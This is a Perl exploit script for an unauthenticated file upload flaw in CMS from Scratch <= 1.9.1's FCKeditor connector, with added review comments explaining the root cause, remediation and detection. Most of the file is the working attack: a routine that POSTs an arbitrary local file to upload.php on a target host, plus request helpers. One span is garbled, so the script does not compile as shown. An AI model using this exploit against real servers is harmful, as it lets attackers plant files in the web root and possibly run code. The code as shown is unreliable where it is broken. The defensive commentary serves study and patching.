#!/usr/bin/perl
# ----------------------------------------------------------------
# CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit
# by yeat - staker[at]hotmail[dot]it
# http://scratchwebdesignforums.com/forums/index.php?showtopic=629
# ----------------------------------------------------------------
# (fckeditor/editor/filemanager/connectors/php/config.php)
# 25. global $Config ;
# 26.
# 27. $Config['Enabled'] = (isset($_SESSION['loginStatus']) ||
# $_SESSION == NULL) ? true : false ;
# ...
# 39. $Config['UserFilesAbsolutePath'] =
# realpath($_SERVER['DOCUMENT_ROOT']);
# ----------------------------------------------------------------
#
# NOTE(review): this listing reached the page collapsed onto one line. Line
# breaks are restored below and no code token is changed. The text between
# "print <" and "4)" in Main::Usage is missing from the page (presumably the
# usage heredoc and the opening of Main::RunExploit), so the script does not
# compile as shown.
#
# Root cause, from the config.php lines quoted above: the connector is
# enabled when $_SESSION['loginStatus'] is set OR when $_SESSION == NULL.
# In PHP the second test is true for a request with no session started (and
# for an empty session array), so the check passes for clients that never
# logged in. Line 39 sets the upload base path to the document root, so an
# accepted file is written under the directory the web server serves.
# Whether such a file can then be executed depends on the connector's
# extension filter and the server configuration, neither of which is shown
# on this page.
#
# Remediation: enable the connector only on a positive login check (drop the
# "|| $_SESSION == NULL" alternative), keep uploads outside the document root
# or in a directory where script execution is disabled, and remove the
# filemanager connector where it is not used.
#
# Detection: POST requests to
# /fckeditor/editor/filemanager/connectors/php/upload.php?Type=File from
# clients without an authenticated session, and files under the document
# root that are not part of the installed release.
use Getopt::Std;
use LWP::UserAgent;

# Accepts a -p option that takes a value. Nothing in the visible code reads
# %opts; HTTP::Proxy below is the likely consumer but is never called here.
getopts('p:',\my %opts);

# Indirect-object call, equivalent to LWP::UserAgent->new. $http is a
# file-scoped lexical that every package below uses directly.
my $http = new LWP::UserAgent;

# Positional arguments: target host and local file path. Neither value is
# validated in the visible code.
my ($host,$file) = @ARGV;

# Entry point; only the tail of RunExploit survives on the page (see below).
Main::RunExploit();

# Main Package
package Main;

sub Usage {
    # NOTE(review): garbled span. The usage text, the end of Usage and the
    # start of RunExploit's argument-count test were lost in extraction; the
    # tokens are kept exactly as found rather than guessed at.
    return print < 4) {
        Main::Usage();
    }
    else {
        FileUpload::Exploit($file);
    }
}

# File Upload Package
package FileUpload;

# Sends the file named by the first argument to the FCKeditor upload
# connector on $host as a multipart/form-data POST (form field "NewFile"),
# prints the response body on success or "Exploit Failed!" otherwise, and
# exits in both cases. The URL is built by plain concatenation with a fixed
# "http://" scheme.
sub Exploit {
    my $file = shift;
    my $path = "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File";
    # An array-ref value makes LWP attach the file's contents; the second
    # element is the filename reported to the server (here the local path).
    my $data = { NewFile => [$file,$file] };
    my $send = $http->post('http://'.$host.$path, $data,
        Content_Type => 'multipart/form-data',
    );

    if ($send->is_success) {
        print $send->content;
        exit;
    }
    else {
        print "Exploit Failed!\n";
        exit;
    }
}

# HTTP Package
# Thin wrappers around the shared $http agent. None of them is called in the
# visible code.
package HTTP;

# Sets the default Cookie request header to the first argument.
sub Cookies {
    return $http->default_header('Cookie' => $_[0]);
}

# Sets the User-Agent string to the first argument.
sub UserAgent {
    return $http->agent($_[0]);
}

# Issues a GET, prefixing "http://" when the argument does not already start
# with it (case-insensitive match).
sub GET {
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }
    else {
        return $http->get($_[0]);
    }
}

# Called with a single argument, so this reads the named default header
# rather than setting one.
sub http_header {
    return $http->default_header($_[0]);
}

# Routes http requests through the proxy given as host[:port].
sub Proxy {
    return $http->proxy('http', 'http://'.$_[0]);
}